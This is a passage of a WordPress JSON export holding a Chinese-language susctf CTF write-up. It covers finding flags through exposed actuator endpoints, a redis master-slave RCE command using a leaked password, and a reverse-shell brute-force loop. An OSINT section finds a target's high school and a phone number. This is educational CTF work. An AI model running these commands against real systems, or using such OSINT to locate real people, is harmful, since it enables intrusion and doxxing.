susctf{flag3_c0n9raTuLAt10n4U_f1nD_fLA9_fa083f44248a}<\/code><\/pre>\n
pen4ruo1-4<\/h3>\n
\u5728pen4ruo1-2\u91ccfscan\u626b\u51fa\u6765\u4e24\u4e2aactuator\u6cc4\u9732\uff0c\u5176\u4e2d\u4e00\u4e2a\u7684env\u91cc\u9762\u5c31\u6709flag<\/p>\n
susctf{flag4_WOoOoO_94t3w4y_f14d9c1e9121}<\/code><\/pre>\n
pen4ruo1-5<\/h3>\n
pen4ruo1-2\u91cc\u8fd8\u770b\u5230\u4e00\u4e2aredis\uff0c\u914d\u5408nacos\u91cc\u7684redis\u5bc6\u7801\u6210\u529f\u8fde\u63a5\u540e\uff0c\u5de5\u5177\u76f4\u63a5\u6253\u6253\u4e3b\u4ecerce<\/a><\/p>\n
\u53d1\u73b0\u5185\u7f51\u7684\u673a\u5668\u662f\u901a\u5916\u7f51\u7684\uff0c\u4e8e\u662f\u5728vps\u4e0a\u76f4\u63a5\u6253\u5c31\u884c<\/p>\n
proxychains4 python3 redis-rogue-server.py --rhost=ruoyi-redis --passwd='susctf@2025!@#(redis)' --lhost=xx.xx.xx.xx --lport=xxxx<\/code><\/pre>\n
\"\"<\/p>\n
OSINT<\/h2>\n
spy<\/h3>\n
google\u641c\u7d22\u56fe\u7247\u53d1\u73b0reddit\u4e0a\u4e00\u6761\u5173\u4e8espy.net\u7684\u5e16\u5b50\uff0c\u641c\u7d22spy.net\u53ef\u4ee5\u53d1\u73b0\u8fd9\u4e2a\u4eba<\/p>\n
\"\"<\/p>\n
\u7136\u540e\u4ed6\u7684facebook\u91cc\u6709\u4ed6\u7684\u9ad8\u4e2d<\/p>\n
Conway Senior High School<\/code><\/pre>\n
\u7535\u8bdd\u7684\u8bdd\u5c31\u76f4\u63a5\u641c\u540d\u5b57\u6328\u4e2a\u8bd5<\/p>\n
4084808671<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
\u563b\u563b Misc Questionnaire \u76f4\u63a5\u586b\uff0c\u6700\u540e\u62bd\u5956\u91cc\u9762\u624d\u6709flag curlbash \u975e\u9884\u671f \u968f\u673a\u6570\u53ef\u4ee5\u53d6\u52300\uff0c\u76f4\u63a5\u53cd\u590d\u8fde\u63a5\u7206\u7834\u5c31\u597d\u4e86\uff0c\u81ea\u5df1vps\u4e0a\u90e8\u7f72\u4e00\u4e2a\u53cd\u5f39shell\u7684\u811a\u672c\u4e00\u76f4\u7b49\u5c31\u597d from pwn import * import requests while 1: r = remote('106.14.191.23', 51240) r.recvuntil(& […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-390","post","type-post","status-publish","format-standard","hentry","category-wp"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/390","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=390"}],"version-history":[{"count":1,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/390\/revisions"}],"predecessor-version":[{"id":391,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/390\/revisions\/391"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=390"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=390"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=390"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}